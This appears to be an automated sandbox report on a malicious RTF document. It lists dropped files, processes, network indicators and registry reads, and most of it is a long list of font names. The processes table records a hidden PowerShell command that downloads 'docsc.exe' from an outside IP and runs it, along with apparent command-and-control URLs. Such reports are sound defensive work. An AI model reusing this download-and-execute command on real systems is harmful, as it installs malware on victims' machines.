Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
1c60a1e9_by_Libranalysis.rtf
|
Rich Text Format data, version 1, unknown character set
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
downloaded
|
||
C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\docsc.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3A4D79D.png
|
370 sysV pure executable
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CA5B12C-492C-4E57-AED2-0E7798ADDEF4}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\OICE_A3A241B7-2F36-435D-B046-C9F74B3487D8.0\FLDA58.tmp
|
370 sysV pure executable
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1c60a1e9_by_Libranalysis.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed May 12 17:33:27
2021, mtime=Wed May 12 17:33:27 2021, atime=Wed May 12 17:33:32 2021, length=366007, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
|
Little-endian UTF-16 Unicode text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DMR481T3UO04FSSHR3G3.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L17W9ZNBCUQUI8JBPCTD.temp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NEKL7LLMA2OV4UGS2LPM.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtf
|
data
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command
'(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process
'C:\Users\user\AppData\Roaming\docsc.exe''
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command
'(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process
'C:\Users\user\AppData\Roaming\docsc.exe''
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command
'(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process
'C:\Users\user\AppData\Roaming\docsc.exe''
|
||
C:\Users\user\AppData\Roaming\docsc.exe
|
'C:\Users\user\AppData\Roaming\docsc.exe'
|
||
C:\Users\user\AppData\Roaming\docsc.exe
|
C:\Users\user\AppData\Roaming\docsc.exe
|
||
C:\Users\user\AppData\Roaming\docsc.exe
|
C:\Users\user\AppData\Roaming\docsc.exe
|
||
C:\Windows\explorer.exe
|
|||
C:\Windows\SysWOW64\NAPSTAT.EXE
|
C:\Windows\SysWOW64\NAPSTAT.EXE
|
||
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
|
'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
|
||
C:\Windows\SysWOW64\cmd.exe
|
/c del 'C:\Users\user\AppData\Roaming\docsc.exe'
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
httP://157.55.173.72/goose/do
|
unknown
|
||
http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV
|
44.230.85.241
|
||
http://157.55.173.72/goose/docsc.exe
|
157.55.173.72
|
||
www.rogegalmish.com/a8si/
|
|||
httP://157.55.173.72/goose/docsc
|
unknown
|
||
http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA==
|
209.143.158.10
|
||
httP://157.55.173.72/goose/docsc.exe
|
unknown
|
||
http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV
|
202.210.8.86
|
||
httP://157.55.17
|
unknown
|
||
http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg==
|
184.168.131.241
|
||
http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV
|
107.155.89.74
|
||
httP://157.55.
|
unknown
|
||
http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV
|
75.2.115.196
|
||
http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg==
|
184.168.131.241
|
||
httP://157.55.173.72/go
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://KK
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
httP://157.55.173.72/goose/docsc.exePE1
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg==
|
34.102.136.180
|
||
http://157.55.173.72
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
4520oceanviewavenue.com
|
184.168.131.241
|
||
betsysellsswfl.com
|
107.155.89.74
|
||
ethereumdailypay.com
|
209.143.158.10
|
||
www.applewholesales.com
|
75.2.115.196
|
||
www.thepocket-onlinelesson.xyz
|
202.210.8.86
|
||
boostcoachingonline.com
|
184.168.131.241
|
||
www.boostcoachingonline.com
|
unknown
|
||
www.foreverjsdesigns.com
|
unknown
|
||
www.southernbrushworks.com
|
unknown
|
||
www.ethereumdailypay.com
|
unknown
|
||
www.qqkit.net
|
unknown
|
||
www.4520oceanviewavenue.com
|
unknown
|
||
www.betsysellsswfl.com
|
unknown
|
||
uixie.porkbun.com
|
44.230.85.241
|
||
southernbrushworks.com
|
34.102.136.180
|
There are 5 hidden domains, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
209.143.158.10
|
ethereumdailypay.com
|
United States
|
||
75.2.115.196
|
www.applewholesales.com
|
United States
|
||
192.168.2.22
|
unknown
|
unknown
|
||
202.210.8.86
|
www.thepocket-onlinelesson.xyz
|
Japan
|
||
157.55.173.72
|
unknown
|
United States
|
||
184.168.131.241
|
4520oceanviewavenue.com
|
United States
|
||
107.155.89.74
|
betsysellsswfl.com
|
United States
|
||
44.230.85.241
|
uixie.porkbun.com
|
United States
|
||
34.102.136.180
|
southernbrushworks.com
|
United States
|
||
192.168.2.255
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ld8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
te8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
*g8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@%SystemRoot%\system32\packager.dll,-2000
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GraphicsFiltersPNGFilesIntl_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EDEDA
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
